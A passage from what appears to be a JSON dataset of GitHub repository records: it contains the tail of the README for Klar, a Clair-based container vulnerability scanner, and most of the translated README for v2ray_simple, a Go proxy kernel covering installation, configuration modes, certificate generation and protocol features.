optimized for. Default is `amd64`. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.\n\n* `REGISTRY_INSECURE` - Allow Klar to access insecure registries (HTTP only). Default is `false`.\n\n* `JSON_OUTPUT` - Output JSON, not plain text. Default is `false`.\n\n* `FORMAT_OUTPUT` - Output format of the vulnerabilities. Supported formats are `standard`, `json`, `table`. Default is `standard`. 
If `JSON_OUTPUT` is set to true, this option is ignored.\n\n* `WHITELIST_FILE` - Path to the YAML file with the CVE whitelist. Look at `whitelist-example.yaml` for the file format.\n\n* `IGNORE_UNFIXED` - Do not count vulnerabilities without a fix towards the threshold\n\nUsage:\n\n CLAIR_ADDR=localhost CLAIR_OUTPUT=High CLAIR_THRESHOLD=10 DOCKER_USER=docker DOCKER_PASSWORD=secret klar postgres:9.5.1\n\n### Debug Output\nYou can enable more verbose output but setting `KLAR_TRACE` to true.\n* run `export KLAR_TRACE=true` to persist between runs.\n\n## Dockerized version\n\nKlar can be dockerized. Go to `$GOPATH/src/github.com/optiopay/klar` and build Klar in project root. If you are on Linux:\n\n CGO_ENABLED=0 go build -a -installsuffix cgo .\n\nIf you are on Mac don't forget to build it for Linux:\n\n GOOS=linux go build .\n\nTo build Docker image run in the project root (replace `klar` with fully qualified name if you like):\n\n docker build -t klar .\n\nThen pass env vars as separate `--env` arguments, or create an env file and pass it as `--env-file` argument. For example save env vars as `my-klar.env`:\n\n CLAIR_ADDR=localhost\n CLAIR_OUTPUT=High\n CLAIR_THRESHOLD=10\n DOCKER_USER=docker\n DOCKER_PASSWORD=secret\n\nThen run\n\n docker run --env-file=my-klar.env klar postgres:9.5.1\n\n## Amazon ECR support\nThere is no permanent username/password for Amazon ECR, the credentials must be retrived using `aws ecr get-login` and they are valid for 12 hours. Here is a sample script which may be used to provide Klar with ECR credentials:\n\n DOCKER_LOGIN=`aws ecr get-login --no-include-email`\n PASSWORD=`echo $DOCKER_LOGIN | cut -d' ' -f6`\n REGISTRY=`echo $DOCKER_LOGIN | cut -d' ' -f7 | sed \"s/https:\\/\\///\"`\n DOCKER_USER=AWS DOCKER_PASSWORD=${PASSWORD} ./klar ${REGISTRY}/my-image\n\n## Google GCR support\nFor authentication against GCR (Google Cloud Registry), the easiest way is to use the [application default credentials](https://developers.google.com/identity/protocols/application-default-credentials). These only work when running Klar from GCP. 
The only requirement is the Google Cloud SDK.\n\n DOCKER_USER=oauth2accesstoken\n DOCKER_PASSWORD=\"$(gcloud auth application-default print-access-token)\"\n\nWith Docker:\n\n DOCKER_USER=oauth2accesstoken\n DOCKER_PASSWORD=\"$(docker run --rm google/cloud-sdk:alpine gcloud auth application-default print-access-token)\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "e1732a364fed/v2ray_simple", "link": "https://github.com/e1732a364fed/v2ray_simple", "tags": ["gobwas", "golang", "grpc", "hysteria", "quic", "trojan", "utls", "v2ray", "grpcsimple", "http2", "vpn", "fallback", "geoip", "geosite", "websocket", "ws", "simplesocks", "shadowtls"], "stars": 503, "description": "a verysimple proxy", "lang": "Go", "repo_lang": "", "readme": "![GoVersion][10] [![GoDoc][1]][2] [![MIT licensed][3]][4] [![Go Report Card][5]][6] [![Downloads ][7]][8] [![release][9]][8]\n\n[1]: https://pkg.go.dev/badge/github.com/e1732a364fed/v2ray_simple.svg\n[2]: https://pkg.go.dev/github.com/e1732a364fed/v2ray_simple#section-readme\n[3]: https://img.shields.io/badge/license-MIT-blue.svg\n[4]: LICENSE\n[5]: https://goreportcard.com/badge/github.com/e1732a364fed/v2ray_simple\n[6]: https://goreportcard.com/report/github.com/e1732a364fed/v2ray_simple\n[7]: https://img.shields.io/github/downloads/e1732a364fed/v2ray_simple/total.svg\n[8]: https://github.com/e1732a364fed/v2ray_simple/releases/latest\n[9]: https://img.shields.io/github/release/e1732a364fed/v2ray_simple/all.svg?style=flat-square\n[10]: https://img.shields.io/github/go-mod/go-version/e1732a364fed/v2ray_simple?style=flat-square\n\n## latest news\n\nThe vsb project already supports the Android VPN function:\nhttps://github.com/e1732a364fed/vsb/releases\n\n#verysimple\n\nverysimple, in fact, the homonym comes from V2ray Simple (obviously only applicable to Chinese native speakers), which means extremely simple.\n\nOnly the project name is v2ray_simple, all other occasions use the name verysimple, which can be referred to as \"vs\".\n\nverysimple is a proxy kernel, benchmarked against v2ray/xray, with rich functions, lightweight, minimalist, user-friendly, and novice-oriented.\n\nThe basic advantages of verysimple are small files, small memory usage, fast speed, and simple and easy to write configuration file format. Compared with v2ray's nested json configuration format, our VS configuration format is completely flat, without so many curly braces\n\nvs simplifies the forwarding mechanism and can improve the running speed. And some users report that the memory usage is 1/3 smaller than that of v2ray/xray.\n\nSome highlights of VS are full-protocol readv acceleration, lazy technology, vless v1, hysteria blocking control, wider utls support, grpc fallback, interactive mode, etc.\n\nThis work takes learning programming technology as the main goal, uses its own code to realize all the good functions of v2ray, discards poor or too complicated functions that cannot be understood or cannot be used by Xiaobai, and uses a simpler architecture developed by itself , combined with self-developed new technologies, to achieve overtaking.\n\nVS is neither a superset nor a subset of v2ray/xray. It belongs to parallel kernels and has intersections. Because VS uses its own architecture, it does not directly come from v2ray. 
It is somewhat similar to the relationship between unix and linux.\n\n\n## Supported features\n\n[win/mac/linux sockopt.device(bindToDevice)]/tcp/udp (and fullcone)/unix domain socket, PROXY protocol v1/v2 listening, splice/readv\n\ntls (including generating random certificates; client certificate verification; rejectUnknownSni), uTls, shadowTls(v1/v2), **tls lazy encrypt**,\n\nhttp masquerade header (**with fallback support**)/ws (and earlydata)/grpc (and multiMode, uTls, and **grpcSimple** with fallback support)/quic (and **hysteria congestion control, including a manual mode**, and 0-rtt)/smux,\n\nsocks5 (including udp associate and user/password auth)/http (and user/password auth)/socks5http (equivalent to clash's mixed)/dokodemo/tproxy/tun/trojan/simplesocks/vless(v0/**v1**)/vmess/shadowsocks, multi-user, http headers\n\ndns(udp/tls)/route(geoip/geosite; the routing/diversion function is fully equivalent to v2ray's)/fallback(path/sni/alpn/PROXY protocol v1/v2), sniffing(tls)\n\ncli(**interactive mode**)/**gui/[vsb plan](https://github.com/e1732a364fed/vsb)(a panel written in flutter)**/apiServer, Docker, docker-compose.\n\n\nTo avoid scaring beginners away, this README puts the installation and usage instructions first. If you want to read the technical introduction directly, jump to [Innovation Point](# Innovation Point).\n\n\n\n## Installation method:\n\n### Download and install\n\nIf you are on a linux server, please refer to the guide [install.md](docs/install.md).\n\nFor a desktop client, just download a build from the [release](https://github.com/e1732a364fed/v2ray_simple/releases) page.\n\nStarting from v1.2.5, this project also publishes the vs_gui series (gui, tun, etc.) for desktop clients.\n\n#### client's geoip and geosite\n\nNote that if you want geoip-based routing with your own mmdb file (for advanced users), you must also download the mmdb;\n\n\nBy default, if the -d parameter is given, the mmdb file and the geosite folder are downloaded automatically; if you specify a configuration file and one of your nodes is available, these two files are downloaded through that node, so don't worry about the download being blocked.\n\nIf you don't use the -d parameter, you can download them in interactive mode, or with the following commands\n\n```sh\n#In the directory where the verysimple executable file is located\ngit clone https://github.com/v2fly/domain-list-community\nmv domain-list-community geosite\n```\n\nThe advantage of downloading through git is that when you want to update, you can simply `git pull`;\n\nThe advantage of downloading through interactive mode or the -d parameter is that, if your configuration file has a working node, the geosite data is downloaded preferentially through that node.\n\n\n### Compile and install\n\n```sh\ngit clone https://github.com/e1732a364fed/v2ray_simple\ncd v2ray_simple/cmd/verysimple && go build\n```\n\nFor optimized compilation parameters, please refer to the Makefile.\n\nIf you downloaded a prebuilt executable, you don't need go build.\n\nNote that starting from v1.1.9, the executable lives in the cmd/verysimple folder, and the repository root is the v2ray_simple package.\n\nIn the past vs was very small, but its size has grown along with its feature set. At present the tun feature takes up the most space; compiling with the notun build tag reduces the size by 3.5MB (a hedged build sketch follows).
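A minimal sketch of such a build, assuming the `notun` tag named above and the standard `go build -tags` syntax (check the Makefile for the authoritative build recipe):\n\n```sh\n# clone as in the \"Compile and install\" section above, then build without the tun feature\ncd v2ray_simple/cmd/verysimple\ngo build -tags notun\n```\n\n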
The second is the quic function , canceling it can also reduce the size\n\n## Operation mode\n\nThis work supports a variety of operating modes, which is convenient for students with different needs\n\n1. Command line mode (also called URL mode)\n2. Standard mode (also known as toml mode)\n3. Compatibility mode\n4. Interactive mode\n5. GUI mode\n\nSince v1.2.5, this project has removed the \"minimalist mode\" in json format.\n\n### Preparation before running\n\nIf it is a client, you can run `./verysimple -i` to enter the interactive mode, and choose to download the geosite folder and the geoip file (GeoLite2-Country.mmdb)\n\nCustom configs can be generated via [interactive mode](#interactive mode).\n\n### Command line mode (also known as URL mode)\n\nYou can use the following commands to run without configuration files. -D If not specified, the default is direct\n\n```sh\n#client\nverysimple -L=socks5://127.0.0.1:10800 -D=vlesss://your uuid@your server ip:443?insecure=true\n\n#Server\nverysimple -L=vlesss://your uuid@your server ip:443?cert=cert.pem&key=cert.key&version=0&fallback=:80\n```\n\nThose who are not careful should pay attention, vlesss, you need three s, otherwise you will be streaking, add the third s to indicate the set of tls\n\nThe command line mode does not support features such as dns, diversion, and complex fallback. It can only be configured in the url to fall back by default.\n\nFor the specific writing method of url format, see: [url standard definition](docs/url.md), vs defines a general url format.\n\nThe command line mode is inherited from v2simple, and the idea is that the fewer words, the better.\n\nHowever, it is recommended that students who do not have minimal requirements directly use the standard mode.\n\nIn addition, verysimple inherits one of the advantages of v2simple, that is, the configuration of the server can also be done with url. Who stipulates that url can only be used to share client configuration? A url is definitely easier to configure than json, is not easy to make mistakes.\n\n### Standard Mode\n\n```sh\n#client, standard mode\nverysimple -c client.toml\n#Server, standard mode\nverysimple -c server.toml\n\n```\n\nThe standard mode uses the toml format, which is similar to the ini of windows, which is friendly to novices and is not easy to make mistakes. It is recommended to use standard mode directly.\n\n**Vlesss.client.toml, vlesss.server.toml, multi.client.toml and other files in the examples folder provide a lot of explanatory notes, which are very friendly to novices. You must read them before you can master the configuration Format. **\n\nMost of our toml sample files have certain teaching significance, and I hope users can read them all.\n\n### compatibility mode\n\nA mode compatible with v2ray's json configuration file will be launched in the future. At present, it is planned to only support the v5 format, but it seems that the v5 documentation of the v2ray community is relatively incomplete, so take your time.\n\n### Interactive Mode\n\nInteractive mode can interactively generate a configuration you want on the command line, so that you don\u2019t need various one-click scripts\n\nThe interactive mode has many interesting functions, you can try it, and it is very flexible to use.\n\nRun `verysimple -i` to enter the interactive mode; you can also specify -i when -c specifies the configuration file, so that it can be dynamically adjusted while running.\n\nCurrently supports the following functions:\n\n1. 
Generate a random ssl certificate\n2. [Interactive generation configuration], super powerful\n3. [Generate share link] <- current configuration\n4. Hot delete configuration\n5. [Hot Reload] New configuration file\n6. [Hot loading] New configuration url\n7. Adjust log level\n8. Adjust hy manual transmission\n9. Generate a random uuid for your reference\n10. Download the geosite folder\n11. Download the geoip file (GeoLite2-Country.mmdb)\n12. Print all protocols supported by the current version\n13. Query current status\n14. Set iptables for tproxy (port 12345)\n15. Remove iptables for tproxy\n\n\nAfter the configuration is generated interactively, it can also be output to a file, loaded into the current operating environment, and generate a sharing link.\n\n### GUI mode\n\nRun verysimple from the distribution starting with vs_gui\n\nThe following is the effect of running on macOS\n\n![](docs/pics/vsgui_baseControl_cb02d3b7.png)\n\n![](docs/pics/vsgui_appControl_cb02d3b7.png)\n\n### other instructions\n\nIf you don't put it in the path, you need `./verysimple`, followed by a dot and a slash. Windows does not have this requirement.\n\n## About certificates\n\n
\n\nGenerate the certificate yourself! And it is best to use the domain name that you really own, and use scripts such as acme.sh to apply for a free certificate, especially when building a website.\n\nAnd after using the real certificate, don't forget to delete `insecure=true` in the configuration file.\n\nUsing a self-signed certificate will be attacked by a man-in-the-middle, and I remind you again. If you are attacked by a man-in-the-middle, you can directly obtain your uuid, and then your server attackers can also use it.\n\nTo apply for a real certificate, only IP is not enough, you must have a domain name. The function of generating random certificates provided by this project is only for quick testing and should not be used in actual situations.\n\n### shell command to generate a self-signed certificate\n\nNote that you will be asked to enter some information when running the second line of command. Make sure at least one line is not blank, such as typing 1\n```sh\nopenssl ecparam -genkey -name prime256v1 -out cert.key\nopenssl req -new -x509 -days 7305 -key cert.key -out cert.pem\n```\n\nThis command will generate an ecc certificate, which is faster than the rsa certificate, which is conducive to speeding up the network speed (accelerating the tls handshake).\n\n#### High-play situations using client certificates:\n\nPlease ignore this paragraph.\n\n```sh\n# Command to generate ca:\nopenssl ecparam -genkey -name prime256v1 -out ca.key\nopenssl req -new -x509 -days 365 -sha256 -key ca.key -out ca.crt #You will be prompted to enter CountryName and other information.\n\n# Use ca to generate client key and crt\nopenssl ecparam -genkey -name prime256v1 -out client.key\nopenssl req -new -key client.key -out client.csr #It will prompt you to enter CountryName and other information.\nopenssl x509 -req -days 365 -sha256 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out client.crt\n```\n\nAfterwards, ca.crt is used for CA (the server needsConfigure this), client.key and client.crt are used for client certificates (clients need to configure this)\n\nNote that the above two commands for generating crt by openssl use the -sha256 parameter, because the default sha1 is already insecure and has been discarded in go1.18.\n\n### Interactive mode Generate certificate\n\nThe interactive mode of this work also has the function of automatically generating random self-signed certificates\n\nAfter downloading the program on your server, run `verysimple -i` to open the interactive mode, then press the down arrow to find the corresponding option, and press Enter to automatically generate the tls certificate.\n\n
\n\n\n# Technology related\n\n
\n\nTechnical related\n\nvery simple project. When forwarding traffic in this project, the key code is directly placed in main.go! Very straight forward and easy to understand.\n\nIn general, the writing of agents is a very simple matter, belonging to the civilian level.\nAs long as it does not involve the analysis of complex tls, tcp, and ip original protocols, and does not involve the formulation of new proxy protocols, it is quite easy to just make a proxy.\n\n\n## Innovation\n\nThere are many innovations in this work, as follows\n\n### agreement\n\nImplemented the vless protocol (v0, v1)\n\nIn this project, the vless v1 standard was developed and implemented (new features are still being developed), and a non-mux fullcone is added;\n\n### lazy techniques\n\nThis project invented a unique non-magically modified tls package bidirectional splice, this work is called tls lazy encrypt, lazy for short\n\n### grpcSimple\n\nImplemented grpcSimple on the basis of Clash's gun.go (MIT protocol) grpc client code, including a complete server, followed the minimalist concept, did not quote Google's grpc package, reduced the compilation size by 4MB, ** and supports Fall back to h2c**.\n\n\n### Architecture\n\nA simple architecture is used, and a lot of performance can be improved just because of the simplicity of the architecture. And the executable file is much smaller than other kernels.\n\nThis work uses a layered architecture, and the network layer, tls layer, advanced layer, proxy layer and other layers do not affect each other.\n\nAll transmission methods can use utls to disguise fingerprints;\nAll methods can choose network layers such as tcp, udp, unix domain socket, etc., and no longer stick to the network layer design of the original protocol.\n\n### Compatibility and Speed\nThe v0 protocol is directly compatible with the existing v2ray/xray, for example, the client can use any existing client that supports vless, and the server can use verysimple\n\nAfter actual speed measurement, even without using any additional technologies such as lazy encrypt, verysimple as a server is still faster than v2ray as a server. It is also established as a client. The speed measurement of the latest 1.10 seems to be faster than xray's xtls without being lazy. ( [Latest Speed \u200b\u200bTest](docs/speed_macos_1.1.0.md) )\n\n### Command Line\n\nThe command line interface of this work also has an \"interactive mode\", welcome to download and experience, use the `-i` parameter to open. PRs are also welcome to enrich the functionality of the interactive mode.\n\n### Implemented useful features beyond innovation\n\nIt supports trojan protocol and smux, and after speed test, it is faster than trojan-go. 
(the speed difference is roughly the same as the difference between this project's vless and v2ray's vless, so no separate speed-test file is published; just refer to the vless numbers).\n\nAutomatically downloads the mmdb file when none is present.\n\nSpeeds up reads with readv.\n\nOther inbound protocols are also supported: socks5, http, dokodemo, vmess, simplesocks, shadowsocks, etc.\n\nA variety of configuration file formats, including its own standard toml format.\n\nDefault fallback, plus fallback by path/sni/alpn.\n\nTraffic routing by geoip, geosite, ip, cidr, domain, tag and network, as well as by country top-level domain, using mmdb and the domain list maintained by the v2fly community.\n\nSupports utls to disguise the tls fingerprint; the utls in this project can also be used together with websocket and grpc (a minimal utls sketch follows this feature list).\n\nSupports websocket, using the high-performance gobwas/ws package, with the 0-rtt early-data method; it should be compatible with existing xray/v2ray.\n\nSupports grpc, compatible with xray/v2ray; also grpcSimple, see above.\n\nGenuine nginx-style refusal to respond.\n\nSupports quic and hysteria congestion control, compatible with xray/v2ray (see the wiki for details), plus a newly developed \"manual transmission\" mode.\n\nAn api server; tproxy transparent proxy; http header mode (so-called obfuscation or camouflage headers), with fallback also supported in this mode.\n\nThis project supports trojan-go's \"pluggable modules\" mode, and build tags can be used to switch individual features on or off. For the sake of speed, however, the coupling is somewhat higher.\n\nThis project also supports clash-style \"use as a library\", and it is very simple; reading the godoc documentation is enough to understand it. The main project has only one main function.\n\nSupports Docker containers, see #56 and cmd/verysimple/Dockerfile; for related questions, please contact the PR author.\n\nVarious third-party sharing-link formats can be generated.\n\nIn short, this project has optimizations in almost every area, surpassing the other cores. Very nice.\n\n
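As a rough illustration of the utls feature mentioned in the list above, the sketch below dials a TLS server while presenting a Chrome-like fingerprint via the widely used refraction-networking/utls package. The target host is a placeholder, and this is not verysimple's own wiring (verysimple configures utls through its config file rather than code); it only shows the underlying idea.\n\n```go\n// Illustrative only: presenting a Chrome-like TLS fingerprint with the\n// refraction-networking/utls package. verysimple wires utls up internally;\n// this standalone sketch just shows the underlying idea.\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net\"\n\n\tutls \"github.com/refraction-networking/utls\"\n)\n\nfunc main() {\n\traw, err := net.Dial(\"tcp\", \"example.com:443\") // plain TCP first; placeholder host\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer raw.Close()\n\n\t// Wrap the raw connection and send a Chrome-shaped ClientHello.\n\tconn := utls.UClient(raw, &utls.Config{ServerName: \"example.com\"}, utls.HelloChrome_Auto)\n\tif err := conn.Handshake(); err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(\"negotiated TLS version:\", conn.ConnectionState().Version)\n}\n```\n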
## Technical details\n\nAlthough this project calls itself v2ray_simple, its actual design philosophy is closer to clash and trojan-go, and I appreciate those two projects more than v2ray.\n\nThat is why I wrote v2ray_simple separately: the structure of v2ray is rather dated and cannot show its strength, while clash and trojan-go are much more advanced.\n\nAt present I believe that only protocols whose outer layer is tls and that support fallback are mainstream.\n\nvmess, a protocol with excessive information entropy, should long since have exited the stage of history. However, the wall's recent sni-blocking behaviour slapped me in the face again; it seems that fully random protocols such as vmess/ssr are still needed...\n\nIn conclusion, the world keeps changing, and technology choices have to adapt.\n\n\n### About vless v1\n\nThe v1 here was drafted by verysimple itself; as always, we cross the river by feeling for the stones. For a discussion of the standard see [vless_v1](docs/vless_v1.md).\n\nIn short, the protocol format was lightly revised and the fullcone handling was improved.\n\nverysimple implements fullcone udp-over-tcp with an original non-mux \"separate channel\" method.\n\nThere are many other new designs in v1, such as connection pooling and dns; see [vless_v1_discussion](docs/vless_v1_discussion.md) for details.\n\nThe vless v1 protocol is still under development, and definitions may be added or changed at any time.\n\nBecause this project was the first to propose developing vless v1, its version numbers also start directly from v1.0.0 (tongue in cheek~).\n\n### About udp\n\nThis project fully supports udp.\n\nThe latest code fully supports udp over vless v0.\n\nLater I implemented vless v1 myself, which naturally supports udp and fullcone; v1 is still in the testing and development stage.\n\nBesides carrying udp as payload, the underlying transport of our protocols also fully supports udp. In other words, udp can be used to transmit vless data, and udp payloads can in turn be carried inside vless.\n\nIf the bottom layer uses plain udp transport, it can be seen as a lower-level mode than v2ray's mkcp transport: raw udp with no control at all, so packets may be lost, resulting in poor speed and instability.\n\n### tls lazy encrypt (splice)\n\n**Note that this feature is not compatible with xtls because the technical implementation is different.** We have to do a lot of work in order to filter outside the tls package, so the implementation differs from xtls.\n\n**The lazy feature is similar to xtls but not compatible with it. If you use lazy, both ends must run verysimple.**\n\nRegarding xtls, you can also read my research article on the xtls 233 vulnerability:\n\nhttps://github.com/e1732a364fed/xtls-\n\n\nThe latest code implements bidirectional tls lazy encrypt, which is an alternative implementation of xtls's splice; the bottom layer also calls splice. To distinguish it, this package calls the method tls lazy encrypt.\n\nThe tls lazy encrypt feature can be enabled at runtime with the -lazy flag (it must be enabled on both server and client), and the tls detection output can be printed with the -pdd flag.\n\nWhen the system does not support the splice and sendfile system calls, the lazy feature degrades to something equivalent to xtls's direct flow control.\n\nBecause it is bidirectional while xtls's splice is unidirectional, tls lazy encrypt should in theory be faster than xtls. Exactly twice as fast? I don't know. In any case, splice is used for both reading and writing.\n\nMoreover, this technique is not implemented by magically modifying the tls package but entirely outside of tls, so the xtls 233 vulnerability I described cannot occur, and in the future it can cooperate with utls to simulate fingerprints.\n\nRegarding splice, you can also refer to my article https://github.com/e1732a364fed/xray_splice-\n\nThis feature is not completely stable yet; it may occasionally break some web pages or produce a bad mac alert. Refreshing the page resolves it.\n\nIt is not that the speed is slow; the current tls filtering method simply has some problems and does not handle close_alert and similar cases well, 
and the symptoms differ from browser to browser.\n\nMy latest code uses a special technique to avoid most of the instability; in short, it is now better suited to watching videos. After all, bidirectional splice does not come for free!\n\nThinking about it later, I realised that xtls's splice is one-way because it needs to filter out certain alerts when writing, otherwise it is easily detected;\n\nbut according to [a report by gfwrev](https://twitter.com/gfwrev/status/1327670741597179906), plain direct copying still has many problems that are hard to solve.\n\nSo, since the problem cannot really be solved, we might as well apply bidirectional splice directly and not filter any alerts at all. In for a penny, in for a pound.\n\nIn short, this splice business is only suitable for playing around with; xtls and all similar copy-and-forward-directly techniques are unreliable. I keep it here as an exercise, so feel free to experiment.\n\nI only try it out on my own intranet and never rely on it for anything that requires real security.\n\nWe should also note an existing \"slowdown\" problem with splice (a Linux forwarding configuration issue); it affects us as well: https://github.com/XTLS/Xray-core/discussions/59\n\n\n\n#### Summary of the technical advantages of tls lazy encrypt (tle)\n\nIt solves the following pain points of xtls:\n\n1. the 233 vulnerability\n2. only one-way splice\n3. cannot work with fullcone\n4. cannot cooperate with utls\n\nReasons:\n\n1. tle does not use loops for tls filtering and does not modify tls packets\n2. tle enables bidirectional splice directly; xtls can only optimize the client side, while tle optimizes both ends. Since most servers run Linux, this greatly improves the performance of every connection.\n3. Because the fullcone in tle's vless v1 is non-mux and uses separate channels, splice should be applicable to it as well (support will be added later; some code may still be needed, to be investigated)\n4. Because tle does not modify the tls package, it can be combined with any tls package, such as utls, which has already been added. So you can enjoy splice and fingerprint camouflage at the same time.\n\nAnd the alerts do not need to be filtered at all, because even after xtls does its filtering there are still two open issues, right?\n\nWe can also consider this later: if the underlying connection uses tls1.2, our upper layer can also handshake with tls1.2. This is feasible because the underlying protocol can be identified right when the client handshake arrives; we make the judgement first and only then initiate the connection to the server.\n\nIt is also possible that the client application speaks tls1.3 while the target server returns tls1.2, for example because the target server is old or tls1.3 has been deliberately disabled. In that case we can consider developing a new technique to work around it and put it into the vless v1 technology stack; see https://github.com/e1732a364fed/v2ray_simple/discussions/2. The sketch below illustrates the splice idea itself.\n\n
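To make the splice idea concrete, here is a minimal, self-contained Go sketch of a plain TCP relay. This is not verysimple's actual lazy code; it only shows the mechanism lazy ultimately rests on: on Linux, io.Copy between two *net.TCPConn goes through TCPConn.ReadFrom and therefore the splice(2) system call, so once a direction no longer needs to be parsed or re-encrypted the payload never has to enter user space. The listen and upstream addresses are placeholders.\n\n```go\n// Illustrative only: the core of a \"lazy\" style relay. Once a connection no\n// longer needs to be inspected or re-encrypted, both directions are copied\n// as-is. On Linux, io.Copy between two *net.TCPConn uses splice(2) under the\n// hood (via TCPConn.ReadFrom), so the bytes stay in the kernel.\npackage main\n\nimport (\n\t\"io\"\n\t\"net\"\n)\n\n// relay shuttles bytes in both directions until both sides are done.\nfunc relay(client, server *net.TCPConn) {\n\tdone := make(chan struct{}, 2)\n\tgo func() {\n\t\tio.Copy(server, client) // client -> server, splice on Linux\n\t\tserver.CloseWrite()\n\t\tdone <- struct{}{}\n\t}()\n\tgo func() {\n\t\tio.Copy(client, server) // server -> client, splice on Linux\n\t\tclient.CloseWrite()\n\t\tdone <- struct{}{}\n\t}()\n\t<-done\n\t<-done\n}\n\nfunc main() {\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:10800\") // placeholder listen address\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfor {\n\t\tc, err := ln.Accept()\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tgo func(client net.Conn) {\n\t\t\tdefer client.Close()\n\t\t\tup, err := net.Dial(\"tcp\", \"127.0.0.1:10801\") // placeholder upstream\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tdefer up.Close()\n\t\t\trelay(client.(*net.TCPConn), up.(*net.TCPConn))\n\t\t}(c)\n\t}\n}\n```\n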
When the new protocol is not in use, lazy can only work around this by not being lazy for tls1.2, i.e. forwarding tls1.3 raw and forwarding tls1.2 encrypted.\n\n## About embedded geoip files\n\nThe default Makefile, or a plain go build, does not enable the embedded data; an external mmdb file has to be loaded, which means you would have to download the mmdb file yourself.\n\n**However, the latest version detects this automatically: if you have no mmdb file, one is downloaded from a CDN for you, so it is already very convenient and nothing needs to be done by hand.**\n\nIt can also be downloaded from the https://github.com/P3TERX/GeoLite.mmdb project, the https://github.com/Loyalsoldier/geoip project, or similar sources.\n\nExternally loaded files must be in the original mmdb format.\n\nIf you want to embed the data at compile time, package it with `tar -czf GeoLite2-Country.mmdb.tgz GeoLite2-Country.mmdb`, put the resulting tgz file in the netLayer folder, and then compile with `go build -tags embed_geoip`.\n\nThe file name used for embedded compilation must be GeoLite2-Country.mmdb.tgz.\n\nThe gzip-compressed form is embedded instead of the raw mmdb in order to reduce the binary size.\n\n## Development standards and concepts\n\nKISS: Keep It Simple, Stupid.\n\nAs much documentation as possible, and as little code as possible. At the same time, this project does not pursue extreme modularity; a reasonable amount of coupling is acceptable. Speed and ease of understanding are always the priority.\n\nWhen reading the code you may occasionally see some \"dirty\" code, such as goto jumps or functions with convoluted steps. But if you think it through and compare, you will find that such code either runs faster or is actually more intuitive and easier to follow.\n\nFor example, in some places where defer would normally be used, we deliberately avoid it and instead place the cleanup before each return, because defer costs performance. There are many similar cases.\n\nOf course, where the benefits of prettier code outweigh the drawbacks, we will gradually improve it later on.\n\n### Documentation\n\nDocumentation and comments should be as detailed as possible, written entirely in Chinese, and should follow golang's recommended conventions as far as possible.\n\nIn golang, the comments are the documentation (the godoc principle), so write plenty of comments. Do not skip an explanation just because it seems repetitive: when the godoc documentation is shown to users on pkg.go.dev, they see the comments first, not the code.\n\nThe generated documentation for this project is at https://pkg.go.dev/github.com/e1732a364fed/v2ray_simple\n\nTo repeat: the more documentation the better, so that the barrier to entry for developers is as low as possible.\n\nI also sometimes post research and discussion articles in the discussions; everyone is welcome to speak up:\nhttps://github.com/e1732a364fed/v2ray_simple/discussions\n\n\n### Code\n\nThe guiding concept of the code is minimalism! That is where the project's name comes from!\n\nFollowing Occam's razor, do not build piles of complicated mechanisms: the simplest code that gets the job done is the best code.\n\n**Contributors must learn these concepts of the project and be able to apply them in your own code.**
\n\n**We will reject or correct code that is not minimalist or not clearly explained.**\n\nIf you have ideas for contributions, please read the developer contributing guidelines in [CONTRIBUTING](CONTRIBUTING.md) or open an issue.\n\n#### Getting started guide for developers\n\nFirst learn to use verysimple; familiarise yourself with this README.md and the configuration files under examples/.\n\nThen read the comments in doc.go and cmd/verysimple/version.go to get a feel for the structure of the project, and read proxy/doc.go to understand the VSI model.\n\nThen study the proxy.BaseInterface interface and its proxy.Base implementation, followed by the various interfaces in advLayer.\n\nAfter that, pick whatever areas interest you and read them in go doc.\n\n## Open-source license of this project\n\nThe MIT license: when you use this project you must also include the MIT license file, and the author bears no responsibility, obligation or liability whatsoever.\n\n## History\n\nStart by reading the v2simple project, a good introductory project:\nhttps://github.com/jarvisgally/v2simple\n\nAfter reading v2simple I forked a version, but the original author had not attached any open-source license, and the original architecture was a bit lacking.\n\nLater it was completely refactored and this project was built from scratch, entirely with its own code. Unexpectedly it grew a great deal and its achievements now overshadow the original.\n\nStill, this project inherits the spirit of v2simple, namely being as simple as possible. I strongly support that spirit and try to make it visible everywhere in verysimple.\n\nThis project inherits the following characteristics from it:\n\n1. The url-based configuration method\n2. The forwarding logic placed directly in main.go\n3. A simple architecture\n\n\n## This project as an inspiration for other projects\n\nGood things are always imitated, though some things are never surpassed. We imitate others and others imitate us, and without noticing it we jointly create an ever better open-source environment.\n\n### v2ray project\nAfter this project advocated further development of vless v1, the v2ray project decided to abandon the vless protocol outright. (tongue in cheek~)\n\n### xray project\nThis project's research into the xtls vulnerabilities and the lazy technique inspired the xray project, which a few months later developed its vision flow control. So this project can be said to have made some contribution to the proxy community~.\n\nHowever, the architecture of xray is too complicated, and it is hard to apply that flow control to every protocol. Thanks to the clean structure of this project, lazy can be used directly with any protocol that has no internal encryption, such as vless, trojan, simplesocks and socks.\n\nThis project supported utls directly once grpc was implemented; xray followed up months later through a developer's PR.\n\n### sing-box project\nThis project was the first to study the gun-lite client and derived the gun-lite server code from it. A few months later sing-box followed up through a developer's PR, but it still does not support grpcSimple's unique fallback to h2.\n\nThis may be because the architecture of sing-box is similar to that of v2ray/xray, which are more complicated and harder to work with; supporting the fallback to h2 requires some special techniques.\n\n\n## Development plan\n\nLong-term plans:\n\n1. 
